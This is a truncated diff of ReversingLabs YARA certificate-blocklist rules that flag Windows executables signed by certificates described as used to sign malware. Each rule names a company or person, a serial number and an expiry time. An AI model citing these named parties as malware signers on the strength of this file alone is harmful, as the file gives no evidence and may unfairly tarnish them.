-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7182-L7200"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7f10b86f156ccac695f480661dfea8bcc455477afd9575230c2f8510327d1996"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L189-L205"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9343,21 +34008,21 @@ rule REVERSINGLABS_Cert_Blocklist_E3D5089D4B8F01Aadce2731062Fb0Cce : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEVELOP - Residence s. r. o." and ( pe.signatures [ i ] . serial == "00:e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" or pe.signatures [ i ] . serial == "e3:d5:08:9d:4b:8f:01:aa:dc:e2:73:10:62:fb:0c:ce" ) and 1618358400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures [ i ] . serial == "4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7c685bb7-3201-5ffc-856b-657d824595ab"
+		id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7202-L7218"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7c9424520afe16bd4769e1be84163ac37b8fb37433931f2e362d90cacc01093"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L207-L223"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9367,21 +34032,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ed801843Fa001B8Add52D3A97B25931 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, zhenganjun" and pe.signatures [ i ] . serial == "57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "30831e91-c2aa-50bc-a0e9-ee7574fc58f4"
+		id = "6dfb0181-299f-5a28-b647-137d75f747a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7220-L7238"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3d8075e34fa3dc221bc2abc2630a93f32efbdde6df270a77b1d6b64d8ce56133"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L225-L241"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9391,21 +34056,21 @@ rule REVERSINGLABS_Cert_Blocklist_D9E834182Dec62C654E775E809Ac1D1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and ( pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" or pe.signatures [ i ] . serial == "d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" ) and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fortuna Games Co., Ltd." and pe.signatures [ i ] . serial == "02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0ef4ce5c-b2a1-59e8-8d39-3cf7ab9fd0e1"
+		id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7240-L7258"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a371092cbf5a1a0c8051ba2b4c9dd758d829a2f0c21c86d1920164a0ae7751e6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L243-L259"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9415,21 +34080,21 @@ rule REVERSINGLABS_Cert_Blocklist_801689896Ed339237464A41A2900A969 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and ( pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" or pe.signatures [ i ] . serial == "80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" ) and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures [ i ] . serial == "40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e45d66b0-58ae-5054-b0a7-47a001daac7a"
+		id = "aebba591-2024-584a-bba6-9a27049cf4b8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7260-L7276"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce6c07b8ae54db03e4fa2739856a8d3dc2051c051a10c3c73501dad4296dde97"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L261-L277"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9439,21 +34104,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Fd3661533Eef209153C9Afec3Ba4D8A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" and 1614816000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9e6a35f-08c2-5f29-9bcf-07a3cddf0fbe"
+		id = "f616e92c-ed9f-581c-aa15-970bddfb073a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7278-L7294"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4e2c967b9502d9009c61831f019ba19367b866e898ca1246a1099d75ad0eb4d5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L279-L295"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9463,21 +34128,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ced87Bd70B092Cb93B182Fac32655F6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" and 1614816000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "602b8c18-3dad-55b9-bb47-3f9835a049ac"
+		id = "4a7a5404-1a20-53a7-9670-6f5215582c9d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7296-L7312"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ef26b4e3c658f53f3048d10bd1b7a2a198cd402e1b7c60e84adadb4f236ccb5d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L297-L313"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9487,21 +34152,21 @@ rule REVERSINGLABS_Cert_Blocklist_047801D5B55C800B48411Fd8C320Ca5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "William Richard John" and pe.signatures [ i ] . serial == "0c:15" and 1387324799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "30e3a977-caa3-5ae0-9cd0-6b2ce62ccebd"
+		id = "919a62ba-2902-5088-ad92-9f1bae23e68f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7314-L7330"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "484932ddfe614fd5ab22361ab281cda62803c98279f938aa5237237fae6a95d6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L315-L331"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9511,21 +34176,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F0Ed5318848703405D40F7C62D0F39A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitry Vasilev" and pe.signatures [ i ] . serial == "0c:0f" and 1386719999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d5f810ee-127a-5df0-9299-ffeaddf369ee"
+		id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7332-L7348"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6be57eb6744ad6d239a0a2cc1ec8c39c9dfd4e4eeb3be9e699516c259f617f0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L333-L349"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9535,21 +34200,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E7545C9Fc5938F5198Ab9F1749Ca31C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JOHN WILLIAM RICHARD" and pe.signatures [ i ] . serial == "06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c2e1f5b-5ff7-51d7-9642-0a527856814c"
+		id = "44fa007f-f5f7-5001-8b92-eb4a657ea756"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7350-L7366"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "804ab8c44e5d97d8e14f852d61094e90d1e3ace66316781e9e79ab46fc7db8e7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L351-L367"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9559,21 +34224,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ddd3796A427B42F2E52D7C7Af0Ca54F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" and 1612915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures [ i ] . serial == "11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9d32947c-778f-5e2d-b0b1-4a17a108035e"
+		id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7368-L7384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b303751e354c346f73368de94b66a960dd12efa0730d2ab14af743810669ac81"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L369-L385"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9583,21 +34248,21 @@ rule REVERSINGLABS_Cert_Blocklist_03B27D7F4Ee21A462A064A17Eef70D6C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CCL TRADING LIMITED" and pe.signatures [ i ] . serial == "03:b2:7d:7f:4e:e2:1a:46:2a:06:4a:17:ee:f7:0d:6c" and 1613952000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures [ i ] . serial == "6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7e13e257-a264-5a40-b670-889045504acf"
+		id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7386-L7404"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L387-L403"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9607,21 +34272,21 @@ rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and ( pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures [ i ] . serial == "b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" ) and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ohanae" and pe.signatures [ i ] . serial == "32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5"
+		id = "e5059974-9ea2-5497-a728-c21a6cdd30e4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7406-L7422"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L405-L421"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -9631,21 +34296,21 @@ rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FreeVox SA" and pe.signatures [ i ] . serial == "01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "690e7919-0344-5bd1-849f-e7bfe2f19276"
+		id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L7424-L7442"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90"
